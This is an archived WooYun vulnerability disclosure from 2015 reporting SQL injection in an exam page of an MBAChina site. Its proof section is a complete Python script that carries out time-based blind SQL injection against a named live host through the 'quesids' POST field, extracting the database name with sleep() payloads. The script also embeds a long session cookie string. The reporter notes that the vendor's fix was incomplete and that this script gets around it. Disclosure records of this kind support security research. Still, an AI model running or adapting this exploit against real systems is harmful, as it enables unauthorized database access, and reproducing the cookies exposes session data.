当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156432

漏洞标题:MBAChina某站存在SQL注入

相关厂商:MBAChina

漏洞作者: 路人甲

提交时间:2015-12-02 20:46

修复时间:2016-01-17 17:34

公开时间:2016-01-17 17:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-02: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经确认,细节仅向厂商公开
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-17: 细节向公众公开

简要描述:

详细说明:

修复不当,修了以后,sqlmap的确跑不出来了。
sleep时间自己改,服务很容易就504了。
-----------
[Done]MySQL user is mbaexam
-----------

漏洞证明:

20151127192005.jpg


import httplib
import time
import urllib
import urllib2
import sys
import random
from time import sleep
payloads = list('dedmbacxsehverabcdefghijklmnopqrstuvwxyz@_.0123456789')
base_url = "/ucenter/exam/getQuesList"
database = ''
def sql():
    post_data={"num":"15","PaperID":"92","title":"%E9%97%AE%E9%A2%98%E6%B1%82%E8%A7%A3","type":"radio","quesids":"a"}
    for i in range(1,10):
        for payload in payloads: 
            sleep(10)
            data2 = "(select(0)from(select(sleep(ascii(mid(database(),%d,1))-%d)))x)" % (i,ord(payload))
            post_data["quesids"] = data2 	   
            data=urllib.urlencode(post_data)
            headers = {"User-agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21",
               "Accept": "*/*",
               "Referer": "ks.mbachina.com",
               "Content-Length":"143",
               "X-Requested-With": "XMLHttpRequest",
               "Accept-Encoding" : "gzip, deflate",
               "Content-Type": "application/x-www-form-urlencoded",
               "Connection": "keep-alive",
			   "Host": "ks.mbachina.com",
			   "Cookie":"_sid=f160eb804c57e011dcc5160e61b5adf3410b599d; _i=%2Fx4a8qmEWqzWf0JVfZb4LbnexT5SGeS%2FYLiDG3NBdAR%2Bo2wSHJLVTA%3D%3D_df54f676c3d4530776ae5b86bc275047_1446692677; _l=1446692494; _178c=36281005%23%23testby; _e=31536000; CNZZDATA30044938=cnzz_eid%3D757341134-1446690162-http%253A%252F%252Faccount.178.com%252F%26ntime%3D1446690162; lzstat_uv=2440368293235315611|3; lzstat_ss=712204841_6_1447188375_3; lstat_bc=1514100093928880260; 6c3ae_lastpos=other; 6c3ae_ck_info=%2F%09; 6c3ae_winduser=VVMEAgIDCTECBlQOXwVVAQNRVwYJVlFVCQEKCAcHWFdQAgQAVVNTVD0%3D; _ystat_style=grey; ali_apache_id=182.92.253.28.1447213753471.996202.8; xman_us_f=x_l=1&x_locale=en_US&no_popup_today=n&x_user=US|cena|john|ifm|744887430&last_popup_time=1447222793563; intl_locale=en_US; aep_usuc_f=site=glo&region=CN&b_locale=en_US&isb=y&isfm=y&c_tp=USD&reg_ver=new; xman_t=QMHin9sVRY0/eDovjFU3qkj7GD8VeVeZJDMunRqt5ivD4El/8Chd5cMsE78C7jHXT1r04qIB+JwdxnYExnyX4tKxPGJ6Xn8i3T5As0PbaTauJauQiGfiHFmTkdQG8kg6RzaHkdWYV6wTc1q2+3hlSHxt500rtzXvM41cTn9cK8RW3DqQ9UdOZzqXTTMkpj7bwr2Zm4mui+D5JQa3FQYvDfgJN0Goq0u3RXwGMR0eydyYXl1qzUV2JDwhfe9DZ1lUFRRtZ3+HmUpIs8kxg906+0FBONRcFOvpI2a+bG+724iiDjSQVy7TXRimUepQC1OIW9fI0eNr1UCz35BEi63u0xUEL+s9CbGw3qIMPKhPyWLor8PtaF4yVAhaCSG0cVzTB8bZD9wMDfhA6edf7Q8Q5zarh1AcILHEuopC44NHyMP//xaHFOXBKcLpuJZLNfGHcwK7QKiry0TBmqC70m9d+8UGmRZsbvFDPDx+K4yTS3yUP5LoH1lC4u5mu6/0EsNHwwgdPvE2vgi+cjOz1hBEYHBrvYFDKCDQZgkBYfap/YvbRDE0NKqXU0trwZLNwR1mplLdYEWeCZLO2JN+KvTxvoizgBokrFIMtfandCMbhKkLiijGZdXQqg==; acs_usuc_t=acs_rt=1ca442554e664f4e95f51dea19820746; intl_common_forever=vS/UslZJX1ujWRRwfsCPfl20zxquyCDw5yQboXfI9OtkQoToTKqo1g==; xman_f=wEVqhH+b+eAR46kvyKARt/oHftT2h6y5ipD+6sjZ9GYmr/Tr+EkQAo+WaYFtZbSHlyqVnNAMvg3VUUBmgidINn2hE/MRdTNR5jJV94TZSQWL2AWP4rwgfVCw4MrcqKyozdB5IjA1FfDv6jYbWh2bfP+5Mjd8EGClZJWA4cDkCC8R4v29HJV/7liC+/CxQhNeT1bG3SiTdQxihGRPrSo6Jktbb5F9UUSMMnuVuBwzqiYTw6JMdkMf+2E2GW67Z6iIGly7gh/1LJ6oqYfD0QVEunnDVY2a3WsxAS/e4NdfJagYx48P3GD2l2oRBYLFcq7XJCFrudnvut2KlHYXT/yGvL5AVLKIxPQFW+Gu1SLwX9W9KhNwvexJnhK40QRBCargRNYYKEvba0g=; ali_beacon_id=182.92.253.28.1447213753471.996202.8; cna=qlA/DuKa3k0CAbZc/RwKyHZQ; __utma=3375712.381681950.1447213757.1447213757.1447222530.2; __utmc=3375712; __utmz=3375712.1447213757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); l=AiwseRMhzL09SxTDNl0-hfWi3AFeVdCP; ali_apache_track=mt=1|ms=|mid=us1125640758ctnk; ali_apache_tracktmp=W_signed=Y; PHPSESSID=90577438460ab02245f9bfdff6d68c7b; CNZZDATA1408427=cnzz_eid%3D288945677-1448603092-http%253A%252F%252Fwww.qq.com%252F%26ntime%3D1448603092"}
           
            try:
                now_time = time.time()
                conn = httplib.HTTPConnection("ks.mbachina.com",timeout=5)
                conn.request('POST', base_url, data, headers)
                data3 = conn.getresponse().read()
            except:
                print ".",
            if time.time() - now_time < 1:
                global database
                database += payload
                print '\r[In Progress]' + database
            else:
                print ".",
if __name__ == "__main__":
    sql()
    print '\n[Done]MySQL user is ' + database

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2015-12-07 18:52

厂商回复:

非常感谢您,问题已着手处理,感谢您对我们安全工作的关注。

最新状态:

暂无